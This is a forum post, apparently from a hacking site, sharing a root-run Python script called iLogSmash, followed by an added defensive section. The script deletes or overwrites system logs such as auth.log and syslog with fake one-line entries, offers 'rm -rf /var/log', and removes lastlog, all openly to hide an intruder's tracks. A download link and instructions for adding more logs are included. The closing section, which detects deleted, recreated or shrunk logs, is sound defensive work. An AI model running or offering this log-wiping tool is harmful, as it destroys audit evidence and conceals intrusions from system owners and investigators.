iLogSmash
  • So I've coded up a little 'project'. Feel free to contribute to your liking and add anything. It's a Python log remover/alterer. Most log remover programs just remove the logs; this one has an option to alter the logs (to make it less suspicious). Of course, the preset log file text is shitty (one line each). But you can alter it to make it look more log-ish.


    #!/usr/bin/python

    import sys, os
    isroot = os.getuid()

    #Global declarations such as log file locations. Add more to fit your needs
    logs = ['/var/log/auth.log', '/var/log/kern.log', '/var/log/boot', '/var/log/aptitude', '/var/log/syslog']

    #Logfile text for option 2(Alter logs). Yes, IK, not the best fake logs. You can make your own if you want.
    log1txt = "linux CRON[10025]: pam_unix: session closed for root\n"
    log2txt = "Linux kernel: Kernel logging (proc) stopped.\n"
    log3txt = "/dev/loop0: clean, 320083/1648320 files, 4462541/6590464 blocks\n"
    log4txt = "Aptitude 0.4.11.11: log report\n"
    log5txt = "Jan 6 06:31:50 vandal rsyslogd: [origin software=rslogds\n"

    print("""
    _ _ _____ _
    (_) | / ____| | |
    _| | ___ __ _| (___ _ __ ___ __ _ ___| |__
    | | | / _ \ / _` |\___ \| '_ ` _ \ / _` / __| '_ \
    | | |___| (_) | (_| |____) | | | | | | (_| \__ \ | | |
    |_|______\___/ \__, |_____/|_| |_| |_|\__,_|___/_| |_|
    __/ |
    |___/
    Author: Chroniccommand
    http://iexploit.org
    Log smasher. Hides your ass

    """)
    print("Logs loaded: ")
    print(logs)

    def main():
        print("\n1 - Delete logs(Alert level - High)\n2 - Alter logs(Alert level - Medium\n3 - Remove all logs(Alert level - VERY HIGH\n4 - Remove lastlog\n5 - Info\n6 - Exit")
        command = raw_input('Choice: ')
        if command == '1':
            print("[+]Deleting logs...")
            try:
                os.remove(logs[0])
                os.remove(logs[1])
                os.remove(logs[2])
                os.remove(logs[3])
                os.remove(logs[4])
                print("[-]Log's removed\n")
                main()
            except:
                print("Error deleting logs\n")
                main()

        elif command == '2':
            print("[+]Altering logs...\n")
            os.remove(logs[0])
            os.remove(logs[1])
            os.remove(logs[2])
            os.remove(logs[3])
            os.remove(logs[4])
            file = open(logs[0], 'a')
            file.write(log1txt)
            file = open(logs[1], 'a')
            file.write(log2txt)
            file = open(logs[2], 'a')
            file.write(log3txt)
            file = open(logs[3], 'a')
            file.write(log4txt)
            file = open(logs[4], 'a')
            file.write(log5txt)
            print("[-]Log's altered\n")
            main()


        elif command == '3':
            print("Warning: About to delete all logs. This can be VERY suspicious. Continue?")
            yesorno = raw_input('Y/N ')
            if yesorno == 'Y':
                try:
                    print("[+]Removing all logs...\n")
                    os.system('rm -rf /var/log')
                    print("[-]All logs removed\n")
                    main()
                except:
                    print("Error removing all logs\n")
                    main()
            elif yesorno == 'N':
                main()

            else:
                print("Please select either Y or N")
                main()

        elif command == '4':
            try:
                print("[+]Removing /var/log/lastlog...")
                os.remove('/var/log/lastlog')
                print("[-]Lastlog removed")
                main()
            except:
                print("Error removing lastlog\n")
                main()
        elif command == '5':
            print("iLogSmash is coded by chroniccommand. Visit http://iexploit.org for more awesomness.\nThis script removes/alters logs on (most) *nix systems. Defaults are auth.log,boot,kern.log,aptitude,syslog.\nChoice 1 deletes the logs loaded in the list logs. This list can be edited to alter/delete more logs.\nChoice 2 alters logs. It first removes them, then replaces them with the test in log1txt etc.\nChoice 3 removes all logs. This can be quite suspicious so only use if you need to.\nChoice 4 removes lastlog. This is the log that logs all connections, who their from, from what tty etc. This is an executable so you can't really edit it(Unless you make a fake one).\n")
            main()

    def root():
        if isroot == 0:
            main()
        else:
            print("You must run this as root\n")
            sys.exit()

    root()

    If you want to edit log file locations, edit them in the list on the top(logs). Of course then you must edit the alterer/remover. This is easy. Say you added another log, /var/log/pwn.log. Just add these to the remover/alter section:

    if command == '1':
        print("[+]Deleting logs...")
        try:
            os.remove(logs[0])
            os.remove(logs[1])
            os.remove(logs[2])
            os.remove(logs[3])
            os.remove(logs[4])
            os.remove(logs[5])
            print("[-]Log's removed\n")
            main()
        except:
            print("Error deleting logs\n")
            main()

    And the alterer:

    elif command == '2':
        print("[+]Altering logs...\n")
        os.remove(logs[0])
        os.remove(logs[1])
        os.remove(logs[2])
        os.remove(logs[3])
        os.remove(logs[4])
        os.remove(logs[5])
        file = open(logs[0], 'a')
        file.write(log1txt)
        file = open(logs[1], 'a')
        file.write(log2txt)
        file = open(logs[2], 'a')
        file.write(log3txt)
        file = open(logs[3], 'a')
        file.write(log4txt)
        file = open(logs[4], 'a')
        file.write(log5txt)
        file = open(logs[5], 'a')
        file.write(log6txt)
        print("[-]Log's altered\n")
        main()


    Note: Sometimes the code blocks on myBB fuck up the code, so I've uploaded it for you.
    http://www.mediafire.com/?voah12ofwo5gr9m
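
From the defender's side, both behaviours described in this post (deleting a log, or replacing it with a single preset line) leave traces that ordinary append-only logging never produces. The following is an added example, not part of the original post: it compares (inode, size) snapshots of monitored logs and flags lines that lack a syslog timestamp prefix. The function names, the sample lines and the temporary stand-in path are constructed for illustration.

```python
import os
import re
import tempfile

# Classic syslog line prefix, e.g. "Jan  6 06:31:50 host " (day is space-padded).
SYSLOG_PREFIX = re.compile(r"^[A-Z][a-z]{2} [ \d]\d \d{2}:\d{2}:\d{2} \S+ ")

def snapshot(paths):
    """Map each monitored log to (inode, size), or None if it is missing."""
    snap = {}
    for path in paths:
        try:
            st = os.stat(path)
            snap[path] = (st.st_ino, st.st_size)
        except FileNotFoundError:
            snap[path] = None
    return snap

def compare(baseline, current):
    """Flag changes that ordinary append-only logging cannot produce."""
    findings = {}
    for path, before in baseline.items():
        if before is None:
            continue  # file was not present at baseline, nothing to compare
        after = current.get(path)
        issues = ["deleted"] if after is None else []
        if after and after[0] != before[0]:
            issues.append("recreated")  # inode changed; rotation does this too
        if after and after[1] < before[1]:
            issues.append("shrunk")     # appends can only grow a file
        if issues:
            findings[path] = issues
    return findings

def untimestamped_lines(lines):
    """Return non-empty lines lacking a syslog timestamp/host prefix."""
    return [ln for ln in lines if ln.strip() and not SYSLOG_PREFIX.match(ln)]

def demo():
    """Constructed scenario: a log is rewritten shorter between two scans."""
    with tempfile.TemporaryDirectory() as d:
        log = os.path.join(d, "auth.log")  # stand-in path, not a real system log
        with open(log, "w") as f:
            f.write("Jan  6 06:31:50 host sshd[812]: Accepted publickey for alice\n" * 20)
        base = snapshot([log])
        with open(log, "w") as f:  # same file, now holding one short line
            f.write("host CRON[1]: session closed\n")
        return compare(base, snapshot([log]))
```

An inode change also happens on normal log rotation, so a "recreated" finding should be correlated with the rotation schedule. Forwarding logs to a remote collector keeps a copy that local deletion cannot reach.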